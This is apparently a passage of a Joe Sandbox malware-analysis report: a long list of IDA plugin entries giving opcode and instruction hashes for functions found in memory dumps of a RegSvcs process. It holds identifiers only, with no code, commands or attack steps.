                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06c8b68cf332919825fffd78b015bc28bc096d0b2e443d183efe798a25f1a5a9
                                                                                        • Instruction ID: be208cd402b00af0e22549d6fb10646339122a503afd825bbf9b5bd50b4c8eeb
                                                                                        • Opcode Fuzzy Hash: 06c8b68cf332919825fffd78b015bc28bc096d0b2e443d183efe798a25f1a5a9
                                                                                        • Instruction Fuzzy Hash: DC2107B5A04204EFDB14CF14C9C0B26BB65FB84324F24C96DE9494B256C776D846EA61
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3d793925edf755507d3948372a667b961ed32137bd2bcaa424687cfa184ac5d4
                                                                                        • Instruction ID: ada11e3073f43be8fa77c784cbceda93e6fa333f325dea1fd58087270deba4a1
                                                                                        • Opcode Fuzzy Hash: 3d793925edf755507d3948372a667b961ed32137bd2bcaa424687cfa184ac5d4
                                                                                        • Instruction Fuzzy Hash: D52104B5A04204DFCB04DF14D5C0B26BB65FB84324F24C96DE90A4B296CB76EC46EB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3147e2af85630be49352fd0e80c0d72cd62eb2bd37eade961d61d64ed884c17
                                                                                        • Instruction ID: 7f5686009f30bc65e08ac7861b82909d5617c1ae0c7031a96d829a31e2604ffd
                                                                                        • Opcode Fuzzy Hash: e3147e2af85630be49352fd0e80c0d72cd62eb2bd37eade961d61d64ed884c17
                                                                                        • Instruction Fuzzy Hash: D22135B2F04244DFDB15DF14D9D0B26BB65FBC4324F24C669E8490B242C37AD846EAA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ea0806a4a0e314bacffc0bbaa81ca7bd150278cd13b513fd06bba146544d752
                                                                                        • Instruction ID: b2debd62c52a4440da909c0ed49dec41d975a34abd7e6fadb1375d8d492c69e7
                                                                                        • Opcode Fuzzy Hash: 6ea0806a4a0e314bacffc0bbaa81ca7bd150278cd13b513fd06bba146544d752
                                                                                        • Instruction Fuzzy Hash: CD2126B1E04244DFEB14DF14C9C0B26BFA5FB85324F34C66DD9094B252C37AD846D661
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4dd3aa9a1d3fda31757a06d50f504ba926158960d66fdf99564d2e897786e571
                                                                                        • Instruction ID: 91a1b65d39c54017fd5b4fec777251d37b4cd59a2ee455099bb3987316fcedd6
                                                                                        • Opcode Fuzzy Hash: 4dd3aa9a1d3fda31757a06d50f504ba926158960d66fdf99564d2e897786e571
                                                                                        • Instruction Fuzzy Hash: 6F31C5B0D01258DFEB24CF99D985B9EBBF5BF48314F24901AE444BB290C7B55845CFA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5236bf4e3dda640c73fc8037aedce7f82290f24bb37121bb9e02a9bcece1793f
                                                                                        • Instruction ID: 55dae6903ff4b5ba39fb9824ac321fc07379cc7e069e53fda5ec4534883dbc97
                                                                                        • Opcode Fuzzy Hash: 5236bf4e3dda640c73fc8037aedce7f82290f24bb37121bb9e02a9bcece1793f
                                                                                        • Instruction Fuzzy Hash: DC110232B100094FDB949AB8A964ABFB2EBEBC9250F104439D50AE7345EE36DD0147D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a836cfdbec7918476c9cef27185490bbc0172c97b25a5571428673ffe73171a0
                                                                                        • Instruction ID: 76fb920ef0ef44ab69686ad6ea8ecf046c526cd7e52566a02aba048fb0543fce
                                                                                        • Opcode Fuzzy Hash: a836cfdbec7918476c9cef27185490bbc0172c97b25a5571428673ffe73171a0
                                                                                        • Instruction Fuzzy Hash: F411B1B03013058FD715EF79D8909AAB7A6FF85354B20593CD216DB390DF359806C790
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1b553baa9c473b8c6930f58249aee9ad8422ca2d2c26c5dc0600d6b4001d3d9d
                                                                                        • Instruction ID: 1136ce88b2a6c831b4b910dab9548bb77c63525e94cf308d5004ed09805185e1
                                                                                        • Opcode Fuzzy Hash: 1b553baa9c473b8c6930f58249aee9ad8422ca2d2c26c5dc0600d6b4001d3d9d
                                                                                        • Instruction Fuzzy Hash: EC01DE33B100090BEB94AABDA9616EF72EBEBC9690F040439D50AE7345FE32DD0643D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 598fa38cb28489925749d4f325d53bf89087e2eca2a0401cbb8d2e1694b7c5ef
                                                                                        • Instruction ID: b888b08331671f512f6e5b7c9a781e31562d0f87e4b5e5652bc575eaacd8536d
                                                                                        • Opcode Fuzzy Hash: 598fa38cb28489925749d4f325d53bf89087e2eca2a0401cbb8d2e1694b7c5ef
                                                                                        • Instruction Fuzzy Hash: EB119076E002189FDB54DBA9ED81ACEB7F4EF49354F0044A6E505E7350EA319D40CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41c3aa810f77b96e0aeca77b89102bc3e0da2db9102294d566755692379c8e05
                                                                                        • Instruction ID: 463303b7550266d6b272ceace7a065396554e11092d35c41aeeacf530c90f224
                                                                                        • Opcode Fuzzy Hash: 41c3aa810f77b96e0aeca77b89102bc3e0da2db9102294d566755692379c8e05
                                                                                        • Instruction Fuzzy Hash: 832103B59002499FDB10CF9AD884ADEBBF5FB88320F14841AE918A7300C375A545CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: eacaa56550cd632f53dbf227ada484561e8a8581a6353984e1fcd8dd11a4f03d
                                                                                        • Instruction ID: ccdf25f1b458e7b032bc1fb1fc1545dc0be1d90d240c575f78a253138320dcd0
                                                                                        • Opcode Fuzzy Hash: eacaa56550cd632f53dbf227ada484561e8a8581a6353984e1fcd8dd11a4f03d
                                                                                        • Instruction Fuzzy Hash: 6701F525B042840FDB4AB7BDA8281BE7FE79FD5240B1884AAD907CB3D6DE348D028751
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a383c6469778677ac59912f512757d17b40cafe859bf9e52f225d2455cbb5f06
                                                                                        • Instruction ID: 2aa3bf0901ab21607d91a1cc9da3c04613991462c805318400dc7a164a755604
                                                                                        • Opcode Fuzzy Hash: a383c6469778677ac59912f512757d17b40cafe859bf9e52f225d2455cbb5f06
                                                                                        • Instruction Fuzzy Hash: B801F236B000141BEB20996DE9A17ABB3DBDBC9764F18883AE00AC7381ED25EC0303C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9db23f3e0920c58946c3df191726c03539e1c0f901b79ee3378b2ac9ad6abb6a
                                                                                        • Instruction ID: 45fa57bbfced1670785b15d76ec49df4206258d27ebb1df4f037a7598482885f
                                                                                        • Opcode Fuzzy Hash: 9db23f3e0920c58946c3df191726c03539e1c0f901b79ee3378b2ac9ad6abb6a
                                                                                        • Instruction Fuzzy Hash: 0F2103B59003499FDB10CF9AD884ADEBBF9FB48320F10841AE919A7250D374A944CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7290941d46ce30d161997dba8acfc20400a5c31d704a4dfe25ee742834002579
                                                                                        • Instruction ID: c03077e737c6bcc902ee539255bb9d772cef39b5516cfcd482f1ef41274371cd
                                                                                        • Opcode Fuzzy Hash: 7290941d46ce30d161997dba8acfc20400a5c31d704a4dfe25ee742834002579
                                                                                        • Instruction Fuzzy Hash: 9D21E3B5D012199FDB00CF9AD885ACEFBF8FB48314F10812AE518A7200C3746944CBA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b1be84e826c466690a757ead7d4821f0c641a558a70fe94aeadff5bc9b7b0c10
                                                                                        • Instruction ID: 5fa627c9e1128a6013b49f5a6b5cffa0ce51c37dc8619bdaba8f13deda132a30
                                                                                        • Opcode Fuzzy Hash: b1be84e826c466690a757ead7d4821f0c641a558a70fe94aeadff5bc9b7b0c10
                                                                                        • Instruction Fuzzy Hash: 2801D432F006141BEB15A27CE96976E73D6EB86664F148829E50BC7380ED2AEC0203C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                        • Instruction ID: bf1112890158c49dee75499f6843c12605f5affc8041d076123d549a8c3550bb
                                                                                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                        • Instruction Fuzzy Hash: E111D075A04280CFCB01CF10D5C4B15BB62FB84324F24C6AAD8494B656C33AE84ADB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                                                                                        • Instruction ID: eddc26932718ae9c8b349c3a74d261c596f653dc381033bb8431f2dcd3d1254e
                                                                                        • Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                                                                                        • Instruction Fuzzy Hash: EE11B275904284CFDB12CF14D5D4B15FB61FB84324F24C6AAD8494B656C33AD84ACB61
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                        • Instruction ID: fccd867db49f853f617ad4d5114c94432d4103c4cd7a8b4c64125ca10b79e5fe
                                                                                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                        • Instruction Fuzzy Hash: E611DD75A04284DFDB11CF10C9C4B15BBA2FB84324F24C6AAD8494B656C33AD84ADF62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116135653.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f6d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
                                                                                        • Instruction ID: 302ba13cd652c677c2064fa11f90ed577df81d3696aba120d02bbec99fdfce0a
                                                                                        • Opcode Fuzzy Hash: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
                                                                                        • Instruction Fuzzy Hash: CA11BF75A04280CFDB15CF14D9C4B15BFB2FB85328F24C6ADD8494B666C37AD84ACB92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85dfde88daa7cb553b7f20510c6f8c57443c26edd278934ddb1059447c48a4c8
                                                                                        • Instruction ID: f74d54717c3fb0baebeb88cfc94e04676a75b83398b24fb13b92cc376959d6aa
                                                                                        • Opcode Fuzzy Hash: 85dfde88daa7cb553b7f20510c6f8c57443c26edd278934ddb1059447c48a4c8
                                                                                        • Instruction Fuzzy Hash: B911D3B5D002199FDB00CF9AD885ACEFBF8FB48314F10812AE918A7300D3746954CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e858669099730caf62671ec04fa84a72ae7e2cb31cc83fe74d9833ca790e815
                                                                                        • Instruction ID: cf1f1be38944540016c93bdea7d1600c69af0be6dc4da1a32c45cc3e164f821c
                                                                                        • Opcode Fuzzy Hash: 6e858669099730caf62671ec04fa84a72ae7e2cb31cc83fe74d9833ca790e815
                                                                                        • Instruction Fuzzy Hash: C201D136B000141BDB65997DA89472BB3DBDBC9760F148839E10EC7385ED25DC0303C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d352f0350d7ca7320d57e993e8121e3dfeccfa93b29e85619da6941c2f0c3d7
                                                                                        • Instruction ID: 137d4a19f329fffa4edf364909c07503e7a63570fee5f4989ffd12ee5ad583a1
                                                                                        • Opcode Fuzzy Hash: 2d352f0350d7ca7320d57e993e8121e3dfeccfa93b29e85619da6941c2f0c3d7
                                                                                        • Instruction Fuzzy Hash: D701D631F005181BEB65A67CE95476E72D6EB85760F108829F50BC7390DD2ADC0203C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5621438a1b6fd410f221c5c09bcdd4da49dcceed6545a40a2cbf160d7b4c6326
                                                                                        • Instruction ID: 8b34fb6279bc31d34963cb05b2ea12397fac335972e4226ca04c4f06b7b65904
                                                                                        • Opcode Fuzzy Hash: 5621438a1b6fd410f221c5c09bcdd4da49dcceed6545a40a2cbf160d7b4c6326
                                                                                        • Instruction Fuzzy Hash: 95014CB0614700DBF364CB29EC88A2F7BE6FB85700F449919E44686680DBB5EC068F95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d7ba5f6e1328e068334656ba6597c7283fa723ac6ea430da9083f7e6a186a957
                                                                                        • Instruction ID: 86c819ae679daeaa20284e38042d3a395f64547d3724ff8b5971a0a0e20ad576
                                                                                        • Opcode Fuzzy Hash: d7ba5f6e1328e068334656ba6597c7283fa723ac6ea430da9083f7e6a186a957
                                                                                        • Instruction Fuzzy Hash: 850171719053549FCB228FB4D801499BFF4EF07210B15859BD49597193C730991ACB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff856b57060d2b6ba4c891aa2714e17436ebf6ba5d91c9cd9b1dc94ada66799c
                                                                                        • Instruction ID: ca0e04b8c6cb44768b43f2d66ca2d5ae715e41717249bd9ee86ac4cb2b305c26
                                                                                        • Opcode Fuzzy Hash: ff856b57060d2b6ba4c891aa2714e17436ebf6ba5d91c9cd9b1dc94ada66799c
                                                                                        • Instruction Fuzzy Hash: D2010434A0524A8FDF48EBB4D9686EEB7F2AF48300F105865C912A72A5EF355D45CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: de67237a3adc40f2be28dfa231512a2191b2ad70eb63b5eb78651ba987d4e699
                                                                                        • Instruction ID: 956fec4a85ef27464525fc152cf45a13748a1658d69137a5148d5b18a0c4ef58
                                                                                        • Opcode Fuzzy Hash: de67237a3adc40f2be28dfa231512a2191b2ad70eb63b5eb78651ba987d4e699
                                                                                        • Instruction Fuzzy Hash: 4701D632F102285BDF546A69EC515AEB766FF85354F004439F901EB341DE32AC0687C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116083003.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f5d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bcbca6f47a850f4690c4acf223682bdf753cc5e26dd3f8230b11b1191d5f6d21
                                                                                        • Instruction ID: 61f7d3e33b2e35ebb9fcbe5908f1ae6e4d1d90180f2c9033860b5d2771556f2e
                                                                                        • Opcode Fuzzy Hash: bcbca6f47a850f4690c4acf223682bdf753cc5e26dd3f8230b11b1191d5f6d21
                                                                                        • Instruction Fuzzy Hash: 64012B7240A3449AE7304E55DCC4727FF9CDF50332F18C41AEE484A182C6789848E7B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 393d3db3abd596c356ab804049f15450852784e71ca889f0ff35b81031d23911
                                                                                        • Instruction ID: bee6ff142719f0e2334f9ce10ee119328dbc6927948bfe909f12f484906d1d3f
                                                                                        • Opcode Fuzzy Hash: 393d3db3abd596c356ab804049f15450852784e71ca889f0ff35b81031d23911
                                                                                        • Instruction Fuzzy Hash: EF1103B59002488FDB20DF9AD885B9EFBF8EB48320F20841AD519A7340D374A544CFA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d0d6b6928cccf926183142e62254a37b66df869b0919923c5dd650e3a5fd3c8
                                                                                        • Instruction ID: 30134b409f487544c56d0052ad6d7e3e3902fb7f33e80da1384b348dd7431142
                                                                                        • Opcode Fuzzy Hash: 5d0d6b6928cccf926183142e62254a37b66df869b0919923c5dd650e3a5fd3c8
                                                                                        • Instruction Fuzzy Hash: 76110C70904608DFEB14CF59D8897AEBFF1BB48310F24C169E9199B290C7744941CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f0681cd18500fcdf44ee52b6758f0c2611d388cb2929c98b1d36c6ed7678a6d4
                                                                                        • Instruction ID: 16fe95ad2a2825c39b30e85cd869fef95dd68f4a63dec86b2982a649c593524f
                                                                                        • Opcode Fuzzy Hash: f0681cd18500fcdf44ee52b6758f0c2611d388cb2929c98b1d36c6ed7678a6d4
                                                                                        • Instruction Fuzzy Hash: 8CF0BB713042544FD764667D98A9DBE77DBFFC51A4B110079E10ACB392D916CC0283D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07a9a8fe9321d66103a35b7655dd2fdd47633411343c1cd60f0fdb78551044c4
                                                                                        • Instruction ID: 599fad97477a5eeaea1bb37d921ba39dc7ef8c095ee7ff311db62a9adfb27679
                                                                                        • Opcode Fuzzy Hash: 07a9a8fe9321d66103a35b7655dd2fdd47633411343c1cd60f0fdb78551044c4
                                                                                        • Instruction Fuzzy Hash: BFF0C876B042046FD705DB9AEC05CAF7BFAEFC4314704C067E518C7252DA359905CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16818df402755bd31164b1d09a005d6cd5d476ae192c314757ee9521faaee7e1
                                                                                        • Instruction ID: 80c01c3637dd8f9008b79fb7d8b58ecc0bae91b75884d9f21d4d20be050bf32c
                                                                                        • Opcode Fuzzy Hash: 16818df402755bd31164b1d09a005d6cd5d476ae192c314757ee9521faaee7e1
                                                                                        • Instruction Fuzzy Hash: A7012170900608DFEB14CF5AD8497AEBEF5BB48310F24C169E8199B290C7744940CF94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8130a15fc34ab108e0f0ace5d30c85ea63703b267b10a078616f273cf973124
                                                                                        • Instruction ID: 1fe4a78f73c5dc9b625f0cee47f3cb4ee330723bb5d3d4391a580020bd0aec3c
                                                                                        • Opcode Fuzzy Hash: d8130a15fc34ab108e0f0ace5d30c85ea63703b267b10a078616f273cf973124
                                                                                        • Instruction Fuzzy Hash: F4010C70C00119DFEF14CF69D4583ED7BF2BF44311F288225E825AA2A1D7754951CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5271c7ff962114c0d5c90a31ec53258e0d63ace185e3fbd327b1f29514c6493f
                                                                                        • Instruction ID: 0eb53c1dec51f4c38852ef12927b807d62a071d404338d560b32c76265baa10e
                                                                                        • Opcode Fuzzy Hash: 5271c7ff962114c0d5c90a31ec53258e0d63ace185e3fbd327b1f29514c6493f
                                                                                        • Instruction Fuzzy Hash: 93F0A7B2B041149FD3049A7EAC55AA7BFFEFFD9721725406BE905C7361D970AC068260
                                                                                        Memory Dump Source
